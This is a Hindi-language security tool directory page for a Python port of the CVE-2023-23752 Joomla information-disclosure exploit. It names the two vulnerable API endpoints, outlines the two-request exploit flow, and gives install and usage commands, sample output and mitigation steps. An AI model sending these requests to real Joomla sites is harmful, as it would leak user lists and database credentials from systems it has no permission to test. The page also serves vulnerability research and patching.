Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-23752 — CVE-2023-23752 शोषण का पायथन पोर्ट — Joomla! < 4.2.8 बिना प्रमाणीकरण के सूचना प्रकटीकरण (उपयोगकर्ता सूची + DB क्रेडेंशियल लीक) | Kitploit
उपकरण/GitHubGitHub/bardlaudian/cve-2023-23752
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubbardlaudian/cve-2023-23752

CVE-2023-23752

CVE-2023-23752 शोषण का पायथन पोर्ट — Joomla! < 4.2.8 बिना प्रमाणीकरण के सूचना प्रकटीकरण (उपयोगकर्ता सूची + DB क्रेडेंशियल लीक)

रिपॉजिटरी देखें
21 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-23752 — Joomla! < 4.2.8 में अनधिकृत सूचना प्रकटीकरण

Python CVE Platform

⚠️ अस्वीकरण: यह उपकरण केवल शैक्षणिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत उपयोग अवैध है।


विषय-सूची

  • अवलोकन
  • कमजोरी का विवरण
  • यह कैसे काम करता है
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
  • उदाहरण
  • शमन उपाय
  • श्रेय
  • संदर्भ

अवलोकन

Joomla! सबसे व्यापक रूप से उपयोग किए जाने वाले ओपन-सोर्स कंटेंट मैनेजमेंट सिस्टम (CMS) में से एक है। संस्करण 4.0.0 से 4.2.7 तक दो API एंडपॉइंट उचित एक्सेस नियंत्रण के बिना उजागर होते हैं, जिससे एक अनधिकृत हमलावर संवेदनशील जानकारी प्राप्त कर सकता है: पंजीकृत उपयोगकर्ता खाते और, कमजोर कॉन्फ़िगरेशन में, साइट का डेटाबेस क्रेडेंशियल।

यह कमजोरी Zewei Zhang (NSFOCUS TIANJI Lab) द्वारा खोजी गई और Joomla! प्रोजेक्ट को सूचित की गई, जिसने संस्करण 4.2.8 में पैच जारी किया। इसे CVE-2023-23752 निर्दिष्ट किया गया।

इस रिपॉजिटरी में ACCEIS द्वारा जारी मूल Ruby एक्सप्लॉइट का Python पोर्ट शामिल है।


कमजोरी का विवरण

क्षेत्रमान
CVECVE-2023-23752
प्रभावितJoomla! 4.0.0 – 4.2.7
प्रकारअनुचित एक्सेस नियंत्रण / सूचना प्रकटीकरण
विशेषाधिकारकोई नहीं (बिना प्रमाणीकरण के)
प्रभावउपयोगकर्ता खातों और DB क्रेडेंशियल का प्रकटीकरण
पैचJoomla! 4.2.8 (2023 में जारी)

यह कैसे काम करता है

Joomla के REST API वेबसर्विस एंडपॉइंट को डेटा लौटाने से पहले प्रमाणीकरण और एक्सेस जाँच लागू करनी चाहिए। प्रभावित संस्करणों में, दो एंडपॉइंट यह जाँच सही ढंग से नहीं करते हैं जब उन्हें public=true क्वेरी पैरामीटर के साथ बुलाया जाता है, तो वे अनुरोध को एक अनाम "सार्वजनिक" एक्सेस स्तर से आया हुआ मानते हैं जिसे केवल गैर-संवेदनशील डेटा उजागर करना चाहिए — लेकिन इसके बजाय आंतरिक जानकारी लीक करता है।

कमजोर एंडपॉइंट

root@kitploit:~
GET /api/index.php/v1/users?public=true
GET /api/index.php/v1/config/application?public=true
  • users एंडपॉइंट पंजीकृत खातों की पूरी सूची लौटाता है: id, प्रदर्शन नाम, उपयोगकर्ता नाम, ईमेल और समूह सदस्यता।
  • config एंडपॉइंट एप्लिकेशन कॉन्फ़िगरेशन लौटाता है, जिसमें — जब इंस्टॉलर को हटाया/सख्त नहीं किया गया है — डेटाबेस होस्ट, उपयोगकर्ता नाम, पासवर्ड, डेटाबेस नाम, प्रीफिक्स और एन्क्रिप्शन सेटिंग्स शामिल हैं।

एक्सप्लॉइट प्रवाह

स्क्रिप्ट निम्नलिखित चरणों को स्वचालित करती है:

root@kitploit:~
1. Send GET request to /api/index.php/v1/users?public=true
2. Parse the JSON:API response and extract user records
3. Send GET request to /api/index.php/v1/config/application?public=true
4. Parse the JSON:API response and extract site + database configuration
5. Print both datasets to the console

किसी भी बिंदु पर कोई प्रमाणीकरण, सत्र या CSRF टोकन की आवश्यकता नहीं है — पूरा हमला दो अनधिकृत GET अनुरोध है।


आवश्यकताएँ

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests --break-system-packages

स्थापना

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2023-23752.git
cd CVE-2023-23752
pip install requests --break-system-packages

उपयोग

root@kitploit:~
usage: CVE-2023-23752.py [-h] url

positional arguments:
  url         Base URL of the target, e.g. http://dev.devvortex.htb

options:
  -h, --help  show this help message and exit

उदाहरण

मूल उपयोग

root@kitploit:~
python3 CVE-2023-23752.py http://127.0.0.1:4242

HTB-शैली लक्ष्य के विरुद्ध

root@kitploit:~
python3 CVE-2023-23752.py http://dev.devvortex.htb

नमूना आउटपुट

root@kitploit:~
=== Users ===
  [123] Administrator (admin) - [email protected] - ['Super Users']

=== Site info ===
  Site name: My Site
  Editor: tinymce
  Captcha: 0
  Access: 1
  Debug status: False

=== Database info ===
  DB type: mysqli
  DB host: localhost
  DB user: joomla_user
  DB password: ********
  DB name: joomla_db
  DB prefix: sd8f2_
  DB encryption: 0

शमन उपाय

  • Joomla! को संस्करण 4.2.8 या बाद में अपडेट करें — यह एकमात्र पूर्ण सुधार है।
  • पहुँच प्रतिबंधित करें वेब सर्वर या WAF स्तर पर /api/index.php/* तक यदि तुरंत अपग्रेड करना संभव नहीं है।
  • क्रेडेंशियल बदलें किसी भी खाते या डेटाबेस उपयोगकर्ता के लिए जो पैच लगाने से पहले इस एंडपॉइंट के माध्यम से उजागर हो सकते हैं।
  • एक्सेस लॉग की निगरानी करें /api/index.php/v1/ वेबसर्विस पथों के लिए अनधिकृत अनुरोधों के लिए।

श्रेय

  • कमजोरी की खोज: Zewei Zhang, NSFOCUS TIANJI Lab
  • मूल एक्सप्लॉइट (Ruby): noraj (Alexandre ZANNI) ACCEIS के लिए — मूल रिपॉजिटरी
  • Python पोर्ट: Bardlaudian

संदर्भ

  • NVD — CVE-2023-23752
  • Exploit-DB — EDB-51334
  • PacketStorm सलाह
  • Joomla! सुरक्षा सलाह
  • खोजकर्ता सलाह — NSFOCUS
  • मूल Ruby एक्सप्लॉइट — Acceis
टूल डाउनलोड करें